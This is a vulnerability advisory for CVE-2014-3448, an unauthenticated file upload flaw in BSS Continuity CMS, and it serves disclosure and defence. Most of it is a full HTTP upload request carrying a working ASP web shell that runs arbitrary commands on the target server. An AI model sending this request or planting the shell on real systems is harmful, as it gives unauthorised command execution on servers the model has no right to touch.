BSS Continuity CMS version 4.2.22640.0 suffers from a remote code execution vulnerability via an unauthenticated file upload.
f64096d831fab8b5daddf9da0cef7ef566ab842ef369e375cbf0cbd1cc51fd22
Vulnerability title: Remote Code Execution Via Unauthenticated File
Upload in BSS Continuity CMS
CVE: CVE-2014-3448
Vendor: BSS
Product: Continuity CMS
Affected version: 4.2.22640.0
Fixed version: N/A
Reported by: Jerzy Kramarz
Details:
The ASPX executable which is responsible for handling file upload functionality allows arbitrary files to be uploaded to any directory specified by an attacker as the file upload function does not does not verify file type or origin when processing the request.
The following request would trigger the vulnerability:
POST http://<target>:<port>/wcm/system/pages/uploadfile.aspx?dir=/upload HTTP/1.1
Host: <target>
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:16.0) Gecko/20100101 Firefox/16.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Referer: http://<target>/wcm/system/pages/uploadfile.aspx
Cookie: WeAreAllDoomed=True;
Content-Type: multipart/form-data; boundary=---------------------------256672629917035
Content-Length: 1279
-----------------------------256672629917035
Content-Disposition: form-data; name="__VIEWSTATE"
-----------------------------256672629917035
Content-Disposition: form-data; name="uploadFile"; filename="shell.asp"
Content-Type: application/octet-stream
<%
if Request.Form("submit") = "Submit" then
Dim wshell, intReturn
set wshell = server.createobject("wscript.shell")
cmd = Request.Form("cmd")
intReturn = wshell.run(cmd, 0, True)
Response.Write( intReturn )
set wshell = nothing
end if
%>
<html>
<head><title></title></head>
<body>
<form action=shell.asp" method="POST">
Command: <Input type="text" name="cmd"><br>
<input type="submit">
</form>
</body>
</html>
-----------------------------256672629917035
Content-Disposition: form-data; name="Upload"
Upload
-----------------------------256672629917035
Content-Disposition: form-data; name="result"
-----------------------------256672629917035
Content-Disposition: form-data; name="tempname"
-----------------------------256672629917035--
Further details at:
https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-3448/
Copyright:
Copyright (c) Portcullis Computer Security Limited 2014, All rights
reserved worldwide. Permission is hereby granted for the electronic
redistribution of this information. It is not to be edited or altered in
any way without the express written consent of Portcullis Computer
Security Limited.
Disclaimer:
The information herein contained may change without notice. Use of this
information constitutes acceptance for use in an AS IS condition. There
are NO warranties, implied or otherwise, with regard to this information
or its use. Any use of this information is at the user's risk. In no
event shall the author/distributor (Portcullis Computer Security
Limited) be held liable for any damages whatsoever arising out of or in
connection with the use or spread of this information.